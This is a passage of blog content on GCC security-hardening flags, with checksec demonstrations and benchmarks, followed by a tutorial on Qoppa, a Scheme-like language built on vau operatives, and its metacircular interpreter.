<li><p><a href="https://wiki.ubuntu.com/Security/Features#fortify-source"><code>-D_FORTIFY_SOURCE=2</code></a> enables some compile-time and run-time checks on memory and string manipulation. This requires <code>-O1</code> or higher. See also <a href="http://www.kernel.org/doc/man-pages/online/pages/man7/feature_test_macros.7.html"><code>man 7 feature_test_macros</code></a>.</p></li>
<li><p><a href="https://bugzilla.redhat.com/show_bug.cgi?id=491266"><code>-fno-strict-overflow</code></a> prevents GCC from optimizing away arithmetic overflow tests.</p></li>
<li><p><a href="https://wiki.ubuntu.com/Security/Features#stack-protector"><code>-fstack-protector-all</code></a> detects stack buffer overflows after they occur, using a <a href="http://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries">stack canary</a>. We also set <span style="white-space:nowrap;"><code>-Wstack-protector</code></span> (warn about unprotected functions) and <span
style="white-space:nowrap;"><code>--param ssp-buffer-size=1</code></span> (protect regardless of buffer size). (Actually, the "<code>-all</code>" part of <span
style="white-space:nowrap;"><code>-fstack-protector-all</code></span> might imply <span style="white-space:nowrap;"><code>ssp-buffer-size=1</code></span>.)</p></li>
<li><p>Attackers can use fragments of legitimate code already in memory to <a href="http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html">stitch together</a> exploits. This is much harder if they don't know where any of that code is located. Shared libraries get <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">random addresses</a> by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a <a href="https://wiki.ubuntu.com/Security/Features#pie">position independent executable</a> (PIE), with the goal that <em>every</em> executable page has a randomized address.</p></li>
<li><p>Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the <a href="http://www.iecc.com/linker/linker10.html">dynamic loader</a> needs to perform relocations there. The GNU linker flag <span style="white-space:nowrap;"><code>-z relro</code></span> arranges to set them as read-only once the dynamic loader is done with them.</p>
<p>In particular, this can <a href="http://www.airs.com/blog/archives/189">protect</a> the <a href="http://www.technovelty.org/linux/pltgot.html">PLT and GOT</a>, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set <span style="white-space:nowrap;"><code>-z now</code></span> to resolve PLT entries at startup so they get RELRO protection.</p></li>
</ul>
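<p>The <code>-fno-strict-overflow</code> item above deserves a concrete illustration. Here's a Python sketch (the helper names are mine, and Python's unbounded integers are manually reduced to simulate 32-bit two's-complement C arithmetic) of the classic overflow test: since signed overflow is undefined behavior in C, an optimizer may assume the test is always false and delete it.</p>

```python
def wrap32(x):
    """Reduce to a signed 32-bit value, as C ints behave with -fwrapv
    or -fno-strict-overflow (wrapping two's complement)."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

def would_overflow(x, n):
    # The classic C idiom `if (x + n < x)` for nonnegative n: it only
    # works if addition wraps. Under strict signed-overflow rules the
    # compiler may conclude this is always false and remove the check.
    return wrap32(wrap32(x) + wrap32(n)) < x

INT_MAX = 0x7FFFFFFF
assert would_overflow(INT_MAX, 100)      # wraps around to a negative value
assert not would_overflow(12345, 100)    # no overflow, test stays false
```

In C the fix is the compiler flag, not rewriting the check; the sketch only shows why the check is meaningless without wrapping semantics.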
<p>In the example project I also enabled <code>-Wall -Wextra -Werror</code>. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project <span
style="white-space:nowrap;"><code>-Wall</code></span>-clean, you can at least add security-relevant checks such as <span
style="white-space:nowrap;"><code>-Wformat-security</code></span>.</p>
<h1 id="demonstration">Demonstration</h1>
<p>On x86 Linux, we can check the hardening features using Tobias Klein's <a href="http://www.trapkit.de/tools/checksec.html">checksec.sh</a>. First, as a control, let's build with no hardening.</p>
<pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh --disable-hardening</span>
+ autoreconf -fi
+ ./configure --disable-hardening
...
+ make
...
<span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span>
<span style="color:red">No RELRO</span> <span style="color:red">No canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span>
</code></pre>
<p>The <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute bit</a> (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:</p>
<pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh</span>
+ autoreconf -fi
+ ./configure
...
checking whether C compiler accepts -fno-strict-overflow... yes
checking whether C++ compiler accepts -fno-strict-overflow... yes
checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes
checking whether C compiler accepts -fstack-protector-all... yes
checking whether C++ compiler accepts -fstack-protector-all... yes
checking whether the linker accepts -fstack-protector-all... yes
checking whether C compiler accepts -Wstack-protector... yes
checking whether C++ compiler accepts -Wstack-protector... yes
checking whether C compiler accepts --param ssp-buffer-size=1... yes
checking whether C++ compiler accepts --param ssp-buffer-size=1... yes
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... yes
checking whether the linker accepts -Wl,-z,relro... yes
checking whether the linker accepts -Wl,-z,now... yes
...
+ make
...
<span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span>
<span style="color:green">Full RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:green">PIE enabled</span>
</code></pre>
<p>We can dig deeper on some of these. <code>objdump -d</code> shows that the unhardened executable puts <code>main</code> at a fixed address, say <code>0x4006e0</code>, while the position-independent executable specifies a small offset like <code>0x9e0</code>. We can also see the stack-canary checks:</p>
<pre><code>b80: sub $0x18,%rsp
b84: mov %fs:0x28,%rax
b8d: mov %rax,0x8(%rsp)
... function body ...
b94: mov 0x8(%rsp),%rax
b99: xor %fs:0x28,%rax
ba2: jne bb4 <c_fun+0x34>
... normal epilogue ...
bb4: callq 9c0 <__stack_chk_fail@plt></code></pre>
<p>The function starts by copying a "<a href="http://en.wikipedia.org/wiki/Animal_sentinels#Detection_of_toxic_gases">canary</a>" value from <code>%fs:0x28</code> to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.</p>
<p>The canary is chosen randomly by glibc at program start. The <code>%fs</code> <a href="http://en.wikipedia.org/wiki/X86_memory_segmentation">segment</a> has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).</p>
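<p>As a toy model of the mechanism, here's a Python sketch (a <code>bytearray</code> stands in for the stack frame; the 16-byte buffer and 8-byte canary layout are illustrative, not glibc's actual layout):</p>

```python
import secrets

CANARY = secrets.token_bytes(8)   # chosen randomly once, like glibc at startup

def vulnerable_copy(data: bytes) -> str:
    # Frame layout sketch: [ 16-byte buffer | canary | saved state... ]
    frame = bytearray(16) + bytearray(CANARY)
    frame[:len(data)] = data                  # an unchecked strcpy-style write
    if bytes(frame[16:24]) != CANARY:         # the epilogue check
        return "*** stack smashing detected ***"
    return "ok"

assert vulnerable_copy(b"short") == "ok"
assert vulnerable_copy(b"A" * 24) == "*** stack smashing detected ***"
```

An overflow long enough to reach the saved return address must first trample the canary, so the epilogue check catches it before the corrupted frame is used.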
<p>The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:</p>
<pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh LDFLAGS=-static</span>
+ autoreconf -fi
+ ./configure LDFLAGS=-static
...
checking whether C compiler accepts -fPIE... yes
checking whether C++ compiler accepts -fPIE... yes
checking whether the linker accepts -fPIE -pie... no
...
+ make
...
<span class="Prompt">$</span> <span class="Entry">file src/test</span>
src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, for GNU/Linux 2.6.26, not stripped
<span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span>
<span style="color:goldenrod">Partial RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span>
</code></pre>
<p>We can't have position independence with static linking. And <code>checksec.sh</code> thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.</p>
<h1 id="performance">Performance</h1>
<p>So what's the catch? These protections can slow down your program significantly. I ran <a href="https://github.com/keithw/mosh/issues/79#issuecomment-4683789">a few benchmarks</a> for Mosh, on three test machines:</p>
<ul class="incremental">
<li><p>A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 <code>i386</code></p></li>
<li><p>A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid <code>amd64</code></p></li>
<li><p>A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid <code>amd64</code></p></li>
</ul>
<p>In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.</p>
<table class="datatable">
<tr><th>
Protections
</th><th>
Netbook
</th><th>
Laptop
</th><th>
Desktop
</th></tr>
<tr><td>
Everything
</td><td>
16.0
</td><td>
4.4
</td><td>
2.1
</td></tr>
<tr><td>
All except PIE
</td><td>
4.7
</td><td>
3.3
</td><td>
2.2
</td></tr>
<tr><td>
All except stack protector
</td><td>
11.0
</td><td>
1.0
</td><td>
1.1
</td></tr>
</table>
<p>PIE really hurts on <code>i386</code> because data references <a href="http://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/">use an extra register</a>, and registers are scarce to begin with. It's much cheaper on <code>amd64</code> thanks to <a href="http://en.wikipedia.org/wiki/Addressing_mode#PC-relative">PC-relative addressing</a>.</p>
<p>There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.</p>
Scheme without special forms: a metacircular adventure (2012-04-28)
<p>A good programming language will have many libraries building on a small set of core features. Writing and distributing libraries is much easier than dealing with changes to a language implementation. Of course, the choice of core features affects the scope of things we can build as libraries. We want a very small core that still allows us to build anything.</p>
<p>The <a href="http://en.wikipedia.org/wiki/Lambda_calculus">lambda calculus</a> can implement any computable function, and encode <a href="http://en.wikipedia.org/wiki/Church_encoding">arbitrary data types</a>. Technically, it's all we need to instruct a computer. But programs also need to be written and understood by humans. We fleshy meatbags will soon get lost in a sea of unadorned lambdas. Our languages need to have more structure.</p>
<p>As an example, the <a href="http://schemers.org/">Scheme</a> programming language is explicitly based on the lambda calculus. But it adds syntactic <a href="http://www.gnu.org/software/mit-scheme/documentation/mit-scheme-ref/Special-Forms.html">special forms</a> for definitions, variable binding, conditionals, etc. Scheme also lets the programmer define new syntactic forms as <a href="http://community.schemewiki.org/?scheme-faq-macros">macros</a> translating to existing syntax. Indeed, <code>lambda</code> and the macro system are enough to implement <a href="http://en.wikipedia.org/wiki/Scheme_(programming_language)#Minimalism">some</a> of the standard special forms.</p>
<p>But we can do better. There's a simple abstraction which lets us define <code>lambda</code>, Lisp or Scheme macros, and all the other special forms as mere library code. This idea was known as "<a href="http://en.wikipedia.org/wiki/Fexpr">fexprs</a>" in old Lisps, and more recently as "operatives" in <a href="http://fexpr.blogspot.com/">John Shutt</a>'s programming language <a href="http://web.cs.wpi.edu/~jshutt/kernel.html">Kernel</a>. Shutt's <a href="http://www.wpi.edu/Pubs/ETD/Available/etd-090110-124904/unrestricted/jshutt.pdf">PhD thesis</a> [PDF] has been a vital resource for learning about this stuff; I'm slowly making my way through its 416 pages.</p>
<p>What I understand so far can be summarized by something self-contained and kind of cool. Here's the agenda:</p>
<ul class="incremental">
<li><p>I'll describe a tiny programming language named Qoppa. Its S-expression syntax and basic data types are borrowed from Scheme. Qoppa has no special forms, and a small set of built-in operatives.</p></li>
<li><p>We'll write a Qoppa interpreter in Scheme.</p></li>
<li><p>We'll write a library for Qoppa which implements enough Scheme features to run the Qoppa interpreter.</p></li>
<li><p>We'll use this nested interpreter to very slowly compute the factorial of 5.</p></li>
</ul>
<p>All of the code is <a href="https://github.com/kmcallister/qoppa">on GitHub</a>, if you'd like to see it in one place.</p>
<h1 id="operatives-in-qoppa">Operatives in Qoppa</h1>
<p>An operative is a first-class value: it can be passed to and from functions, stored in data structures, and so forth. To use an operative, you apply it to some arguments, much like a function. The difference is that</p>
<ol class="incremental" style="list-style-type: lower-alpha">
<li><p>The operative receives its arguments as unevaluated syntax trees, and</p></li>
<li><p>The operative also gets an argument representing the variable-binding environment at the call site.</p></li>
</ol>
<p>Just as Scheme's functions are constructed by the <code>lambda</code> syntax, Qoppa's operatives are constructed by <code>vau</code>. Here's a simple example:</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define quote
(<span class="kw">vau</span> (x) env
x))</code></pre>
<p>We bind a single argument as <code>x</code>, and bind the caller's environment as <code>env</code>. (Since we don't use <code>env</code>, we could replace it with <code>_</code>, which means to ignore the argument in that position, like Haskell's <code>_</code> or Kernel's <code>#ignore</code>.) The body of the <code>vau</code> says to return the argument <code>x</code>, unevaluated.</p>
<p>So this implements Scheme's <code>quote</code> special form. If we evaluate the expression <code>(quote x)</code> we'll get the symbol <code>x</code>. As it happens, <code>quote</code> is used sparingly in Qoppa. There is usually a cleaner alternative, as we'll see.</p>
<p>Here's another operative:</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define list (<span class="kw">vau</span> xs env
(if (<span class="kw">null?</span> xs)
(quote ())
(<span class="kw">cons</span>
(<span class="kw">eval</span> env (<span class="kw">car</span> xs))
(<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))))))</code></pre>
<p>This <code>list</code> operative does the same thing as Scheme's <code>list</code> function: it evaluates any number of arguments and returns them in a list. So <code>(list (+ 2 2) 3)</code> evaluates to the list <code>(4 3)</code>.</p>
<p>In Scheme, <code>list</code> is just <code>(lambda xs xs)</code>. In Qoppa it's more involved, because we must explicitly evaluate each argument. This is the hallmark of (meta)programming with operatives: we selectively evaluate using <code>eval</code>, rather than selectively suppressing evaluation using <code>quote</code>.</p>
<p>The last part of this code deserves closer scrutiny:</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))</code></pre>
<p>What if the caller's environment <code>env</code> contains a local binding for the name <code>list</code>? Not to worry, because we aren't quoting the name <code>list</code>. We're building a cons pair whose car is the <em>value</em> of <code>list</code>... an operative! Supposing <code>xs</code> is <code>(1 2 3)</code>, the expression</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">cons</span> list (<span class="kw">cdr</span> xs))</code></pre>
<p>evaluates to the list</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<some-value-representing-an-operative> <span class="dv">2</span> <span class="dv">3</span>)</code></pre>
<p>and <em>that's</em> what <code>eval</code> sees. Just like <code>lambda</code>, evaluating a <code>vau</code> expression captures the current environment. When the resulting operative is used, the <code>vau</code> body gets values from this captured static environment, not the dynamic argument of the caller. So we have lexical scoping by default, with the option of dynamic scoping thanks to that <code>env</code> parameter.</p>
<p>Compare this situation with Lisp or Scheme macros. Lisp macros build code which refers to external stuff by name. Maintaining <a href="http://en.wikipedia.org/wiki/Hygienic_macro">macro hygiene</a> requires constant attention by the programmer. Scheme's macros are hygienic by default, but the macro system is far more complex. Rather than writing ordinary functions, we have to use one of several <a href="http://community.schemewiki.org/?syntax-case">special-purpose sublanguages</a>. Operatives provide the safety of Scheme macros, but (like Lisp macros) they use only the core computational features of the language.</p>
<h1 id="implementing-qoppa">Implementing Qoppa</h1>
<p>Now that you have a taste of what the language is like, let's write a Qoppa interpreter in Scheme.</p>
<p>We will represent an environment as a list of frames, where a frame is simply an <a href="http://en.wikipedia.org/wiki/Association_list">association list</a>. Within the <code>vau</code> body in</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">( (<span class="kw">vau</span> (x) _ x) <span class="dv">3</span> )</code></pre>
<p>the current environment would be something like</p>
<pre><code>( ;; local frame
((x 3))
;; global frame
((cons <operative>)
(car <operative>)
...) )</code></pre>
<p>Here's a Scheme function to build a frame from some names and the corresponding values.</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(bind param val) (<span class="kw">cond</span>
((<span class="kw">and</span> (<span class="kw">null?</span> param) (<span class="kw">null?</span> val))
'())
((<span class="kw">eq?</span> param '_)
'())
((<span class="kw">symbol?</span> param)
(<span class="kw">list</span> (<span class="kw">list</span> param val)))
((<span class="kw">and</span> (<span class="kw">pair?</span> param) (<span class="kw">pair?</span> val))
(<span class="kw">append</span>
(bind (<span class="kw">car</span> param) (<span class="kw">car</span> val))
(bind (<span class="kw">cdr</span> param) (<span class="kw">cdr</span> val))))
(<span class="kw">else</span>
(error <span class="st">"can't bind"</span> param val))))</code></pre>
<p>We allow names and values to be arbitrary trees, so for example</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(bind
'((a b) . c)
'((<span class="dv">1</span> <span class="dv">2</span>) <span class="dv">3</span> <span class="dv">4</span>))</code></pre>
<p>evaluates to</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">((a <span class="dv">1</span>)
(b <span class="dv">2</span>)
(c (<span class="dv">3</span> <span class="dv">4</span>)))</code></pre>
<p>(If you'll recall, <code>(x . y)</code> is the pair formed by <code>(cons 'x 'y)</code>, an <a href="http://clhs.lisp.se/Body/26_glo_i.htm#improper_list">improper list</a>.) The generality of <code>bind</code> means our argument-binding syntax — in <code>vau</code>, <code>lambda</code>, <code>let</code>, etc. — will be richer than Scheme's.</p>
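<p>For a rough feel of how <code>bind</code> recurses, here is the same idea sketched in Python (tuples stand in for cons lists, so the dotted-tail case becomes ordinary tuple matching):</p>

```python
def bind(param, val):
    """Match a parameter tree against a value tree, returning a list of
    (name, value) pairs -- a sketch of the interpreter's `bind`."""
    if param == "_":
        return []                        # ignore this position
    if isinstance(param, str):
        return [(param, val)]            # a symbol binds the whole value
    if isinstance(param, tuple) and isinstance(val, tuple) \
            and len(param) == len(val):
        out = []
        for p, v in zip(param, val):     # recurse pointwise into the trees
            out += bind(p, v)
        return out
    raise ValueError(f"can't bind {param!r} to {val!r}")

assert bind((("a", "b"), "c"), ((1, 2), (3, 4))) == \
    [("a", 1), ("b", 2), ("c", (3, 4))]
```

This mirrors the Scheme example: <code>a</code> and <code>b</code> destructure the nested list, while <code>c</code> captures the whole tail.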
<p>Next, a function to find a <code>(name value)</code> entry, given the name and an environment. This just invokes <a href="http://www.math.grin.edu/~stone/scheme-web/assq.html"><code>assq</code></a> on each frame until we find a match.</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-lookup name env)
(<span class="kw">if</span> (<span class="kw">null?</span> env)
(error <span class="st">"could not find"</span> name)
(<span class="kw">let</span> ((binding (<span class="kw">assq</span> name (<span class="kw">car</span> env))))
(<span class="kw">if</span> binding
binding
(m-lookup name (<span class="kw">cdr</span> env))))))</code></pre>
<p>We also need a representation for operatives. A simple choice is that a Qoppa operative is represented by a Scheme procedure that takes the operands and current environment as arguments. Now we can write the Qoppa evaluator itself.</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-eval env exp) (<span class="kw">cond</span>
((<span class="kw">symbol?</span> exp)
(<span class="kw">cadr</span> (m-lookup exp env)))
((<span class="kw">pair?</span> exp)
(m-operate env (m-eval env (<span class="kw">car</span> exp)) (<span class="kw">cdr</span> exp)))
(<span class="kw">else</span>
exp)))
(<span class="kw">define</span><span class="fu"> </span>(m-operate env operative operands)
(operative env operands))</code></pre>
<p>The evaluator has only three cases. If <code>exp</code> is a symbol, it refers to a value in the current environment. If it's a cons pair, the car must evaluate to an operative and the cdr holds operands. Anything else evaluates to itself: numbers, strings, Booleans, and Qoppa operatives (represented by Scheme procedures).</p>
<p>Instead of the traditional <a href="http://icampus.mit.edu/xTutor/public/images/content/5/sicp-cover.jpg">eval and apply</a> we have "eval" and "operate". Thanks to our uniform representation of operatives, the latter is very simple.</p>
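<p>The shape of this evaluator translates almost line for line into Python. In the sketch below (my own simplifications: dict frames instead of alists, strings for symbols, tuples for combinations), <code>quote</code> becomes a one-line operative:</p>

```python
def m_eval(env, exp):
    if isinstance(exp, str):            # a symbol: look it up
        return lookup(exp, env)
    if isinstance(exp, tuple):          # a combination: evaluate the car,
        op = m_eval(env, exp[0])        # then hand over the raw operands
        return m_operate(env, op, exp[1:])
    return exp                          # everything else self-evaluates

def m_operate(env, operative, operands):
    return operative(env, operands)     # an operative is just a function

def lookup(name, env):
    for frame in env:                   # env is a list of dict frames
        if name in frame:
            return frame[name]
    raise NameError(f"could not find {name}")

# quote as an operative: return the single operand unevaluated.
quote = lambda env, operands: operands[0]

global_env = [{"quote": quote, "x": 42}]
assert m_eval(global_env, "x") == 42
assert m_eval(global_env, ("quote", "x")) == "x"
```

Note the same three cases as the Scheme version: symbol, pair (tuple), and self-evaluating data.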
<h1 id="qoppa-builtins">Qoppa builtins</h1>
<p>Now we need to populate the global environment with useful built-in operatives. <code>vau</code> is the most significant of these. Here is its corresponding Scheme procedure.</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(m-vau static-env vau-operands)
(<span class="kw">let</span> ((params (<span class="kw">car</span> vau-operands))
(env-param (<span class="kw">cadr</span> vau-operands))
(body (<span class="kw">caddr</span> vau-operands)))
(<span class="kw">lambda</span> (dynamic-env operands)
(m-eval
(<span class="kw">cons</span>
(bind
(<span class="kw">cons</span> env-param params)
(<span class="kw">cons</span> dynamic-env operands))
static-env)
body))))</code></pre>
<p>When applying <code>vau</code>, you provide a parameter tree, a name for the caller's environment, and a body. The result of applying <code>vau</code> is an operative which, when applied, evaluates that body. It does so in the environment captured by <code>vau</code>, extended with arguments.</p>
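<p>Here's a self-contained Python sketch of the whole mechanism (simplified: flat parameter lists rather than the full tree-matching <code>bind</code>, and dict frames rather than alists):</p>

```python
def m_eval(env, exp):
    if isinstance(exp, str):                     # symbol lookup
        for frame in env:
            if exp in frame:
                return frame[exp]
        raise NameError(exp)
    if isinstance(exp, tuple):                   # apply an operative
        return m_eval(env, exp[0])(env, exp[1:])
    return exp                                   # self-evaluating

def m_vau(static_env, operands):
    params, env_param, body = operands
    def operative(dynamic_env, args):
        # Bind the caller's environment and the *unevaluated* operands,
        # then evaluate the body in the captured static environment:
        # lexical scope by default.
        frame = dict(zip(params, args))
        frame[env_param] = dynamic_env
        return m_eval([frame] + static_env, body)
    return operative

global_env = [{"vau": m_vau}]
# ((vau (x) e x) foo) behaves like quote: foo comes back unevaluated.
assert m_eval(global_env, (("vau", ("x",), "e", "x"), "foo")) == "foo"
```

The operand <code>foo</code> reaches the body as a raw symbol because the operative, not the evaluator, decides what gets evaluated.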
<p>Here's the global environment:</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">define</span><span class="fu"> </span>(make-global-frame)
(<span class="kw">define</span><span class="fu"> </span>(wrap-primitive fun)
(<span class="kw">lambda</span> (env operands)
(apply fun (map (<span class="kw">lambda</span> (exp) (m-eval env exp)) operands))))
(<span class="kw">list</span>
(<span class="kw">list</span> 'vau m-vau)
(<span class="kw">list</span> 'eval (wrap-primitive m-eval))
(<span class="kw">list</span> 'operate (wrap-primitive m-operate))
(<span class="kw">list</span> 'lookup (wrap-primitive m-lookup))
(<span class="kw">list</span> 'bool (wrap-primitive (<span class="kw">lambda</span> (b t f) (<span class="kw">if</span> b t f))))
(<span class="kw">list</span> 'eq? (wrap-primitive <span class="kw">eq?</span>))
<span class="co">; more like these</span>
))
(<span class="kw">define</span><span class="fu"> global-env </span>(<span class="kw">list</span> (make-global-frame)))</code></pre>
<p>Other than <code>vau</code>, each built-in operative evaluates all of its arguments. That's what <code>wrap-primitive</code> accomplishes. We can think of these as functions, whereas <code>vau</code> is something more exotic.</p>
<p>We expose the interpreter's <code>m-eval</code> and <code>m-operate</code>, which are essential for building new features as library code. We could implement <code>lookup</code> as library code; providing it here just prevents some code duplication.</p>
<p>The other functions inherited from Scheme are:</p>
<ul class="incremental">
<li><p>Type predicates: <code>null?</code> <code>symbol?</code> <code>pair?</code></p></li>
<li><p>Pairs: <code>cons</code> <code>car</code> <code>cdr</code> <code>set-car!</code> <code>set-cdr!</code></p></li>
<li><p>Arithmetic: <code>+</code> <code>*</code> <code>-</code> <code>/</code> <code><=</code> <code>=</code></p></li>
<li><p>I/O: <code>error</code> <code>display</code> <code>open-input-file</code> <code>read</code> <code>eof-object</code></p></li>
</ul>
<h1 id="scheme-as-a-qoppa-library">Scheme as a Qoppa library</h1>
<p>The Qoppa interpreter uses Scheme syntax like <code>lambda</code>, <code>define</code>, <code>let</code>, <code>if</code>, etc. Qoppa itself supports none of this; all we get is <code>vau</code> and some basic data types. But this is enough to build a Qoppa library which provides all the Scheme features we used in the interpreter. This code starts out very cryptic, and becomes easier to read as we have more high-level features available. You can read through <a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop">the full library</a> if you like. This section will go over some of the more interesting parts.</p>
<p>Our first task is a bit of a puzzle: how do you define <code>define</code>? It's only possible because we expose the interpreter's representation of environments. We can push a new binding onto the top frame of <code>env</code>, like so:</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(<span class="kw">set-car!</span> env
(<span class="kw">cons</span>
(<span class="kw">cons</span> <name> (<span class="kw">cons</span> <value> null))
(<span class="kw">car</span> env)))</code></pre>
<p>We use this idea twice, once inside the <code>vau</code> body for <code>define</code>, and once to define <code>define</code> itself.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">((<span class="kw">vau</span> (name-of-define null) env
(<span class="kw">set-car!</span> env (<span class="kw">cons</span>
(<span class="kw">cons</span> name-of-define
(<span class="kw">cons</span> (<span class="kw">vau</span> (name exp) defn-env
(<span class="kw">set-car!</span> defn-env (<span class="kw">cons</span>
(<span class="kw">cons</span> name (<span class="kw">cons</span> (<span class="kw">eval</span> defn-env exp) null))
(<span class="kw">car</span> defn-env))))
null))
(<span class="kw">car</span> env))))
define ())</code></pre>
<p>Next we'll define Scheme's <code>if</code>, which evaluates one branch or the other. We do this in terms of the Qoppa builtin <code>bool</code>, which always evaluates both branches.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define if (<span class="kw">vau</span> (b t f) env
(<span class="kw">eval</span> env
(<span class="kw">bool</span> (<span class="kw">eval</span> env b) t f))))</code></pre>
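<p>A Python sketch makes the eager/lazy distinction concrete (strings as symbols, tuples as forms, operatives as plain functions; this mirrors the derivation rather than the exact Qoppa code):</p>

```python
def m_eval(env, exp):
    if isinstance(exp, str):
        return env[exp]                 # symbol lookup in one flat frame
    if isinstance(exp, tuple):
        op = m_eval(env, exp[0])
        return op(env, exp[1:])
    return exp

def bool_prim(env, operands):
    # Eager: all three operands are evaluated, including both branches.
    b, t, f = (m_eval(env, o) for o in operands)
    return t if b else f

def if_op(env, operands):
    # Lazy: pick the branch *expression* first, evaluate only that one.
    b, t, f = operands
    return m_eval(env, t if m_eval(env, b) else f)

env = {"bool": bool_prim, "if": if_op, "flag": True, "x": 1}
assert m_eval(env, ("if", "flag", "x", "undefined")) == 1   # dead branch untouched
try:
    m_eval(env, ("bool", "flag", "x", "undefined"))         # eager: blows up
except KeyError:
    pass
```

The untaken branch contains an unbound symbol: the derived <code>if</code> never looks at it, while the eager <code>bool</code> fails trying to evaluate it.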
<p>We already saw the code for <code>list</code>, which evaluates each of its arguments. Many other operatives have this behavior, so we should abstract out the idea of "evaluate all arguments". The operative <code>wrap</code> takes an operative and returns a transformed version of that operative, which evaluates all of its arguments.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define wrap (<span class="kw">vau</span> (operative) oper-env
(<span class="kw">vau</span> args args-env
(<span class="kw">operate</span> args-env
(<span class="kw">eval</span> oper-env operative)
(<span class="kw">operate</span> args-env list args)))))</code></pre>
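<p>In Python terms, where an operative is a function of the caller's environment and raw operands, the effect of <code>wrap</code> can be sketched like this (the stub evaluator handles only symbols and literals, which is enough for the demo):</p>

```python
def m_eval(env, exp):
    # Stub evaluator: a symbol looks itself up, anything else self-evaluates.
    return env[exp] if isinstance(exp, str) else exp

def wrap(operative):
    # Return a version of `operative` that first evaluates every operand
    # in the caller's environment -- i.e., an ordinary function.
    def applicative(env, operands):
        return operative(env, tuple(m_eval(env, o) for o in operands))
    return applicative

raw = lambda env, operands: operands     # returns its operands unevaluated
listy = wrap(raw)                        # ...and this evaluates them first

env = {"x": 4}
assert raw(env, ("x", 3)) == ("x", 3)
assert listy(env, ("x", 3)) == (4, 3)
```

This matches the earlier example: <code>(list (+ 2 2) 3)</code> evaluates its operands before collecting them, exactly what wrapping adds.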
<p>Now we can implement <code>lambda</code> as an operative that builds a <code>vau</code> term, <code>eval</code>s it, and then <code>wrap</code>s the resulting operative.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define lambda (<span class="kw">vau</span> (params body) static-env
(wrap
(<span class="kw">eval</span> static-env
(list <span class="kw">vau</span> params '_ body)))))</code></pre>
<p>This works just like Scheme's <code>lambda</code>:</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define fact (lambda (n)
(if (<span class="kw"><=</span> n <span class="dv">1</span>)
<span class="dv">1</span>
(<span class="kw">*</span> n (fact (<span class="kw">-</span> n <span class="dv">1</span>))))))</code></pre>
<p>Actually, it's incomplete, because Scheme's <code>lambda</code> allows an arbitrary number of expressions in the body. In other words Scheme's</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) a b c)</code></pre>
<p>is syntactic sugar for</p>
